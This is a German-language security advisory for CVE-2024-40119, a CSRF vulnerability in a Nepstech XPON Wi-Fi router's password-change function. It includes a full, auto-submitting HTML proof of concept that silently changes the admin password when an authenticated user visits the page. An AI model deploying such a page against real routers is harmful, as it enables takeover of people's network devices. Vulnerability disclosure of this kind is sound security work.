
Cross-Site Request Forgery (CSRF)-Schwachstelle in der Passwortänderungsfunktion, die es entfernten Angreifern ermöglicht, das Admin-Passwort ohne Zustimmung des Benutzers zu ändern, was zu einer möglichen Kontoübernahme führen kann.
Subhodeep Baroi
CVE-2024-40119 ist eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle im Nepstech Wifi Router xpon NTPL-XPON1GFEVN v1.0 mit Firmware v2.0.1. Diese Schwachstelle ermöglicht es entfernten Angreifern, das Administratorkennwort ohne Zustimmung des Benutzers zu ändern, was zu einer möglichen Übernahme des Kontos führt.
Ein entfernter Angreifer kann eine bösartige HTML-Seite erstellen, die die Kennwortänderungsfunktion auslöst, wenn sie von einem authentifizierten Benutzer besucht wird. Nachfolgend finden Sie einen Beispiel-Angriffsvektor:
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
<input type="hidden" name="name0" value="admin" />
<input type="hidden" name="name1" value="user" />
<input type="hidden" name="name2" value="user3" />
<input type="hidden" name="oldUsername" value="admin" />
<input type="hidden" name="newUsername" value="" />
<input type="hidden" name="oldPassword" value="" />
<input type="hidden" name="newPassword" value="UserUser2@" />
<input type="hidden" name="cfmPassword" value="UserUser2@" />
<input type="hidden" name="accountflg" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>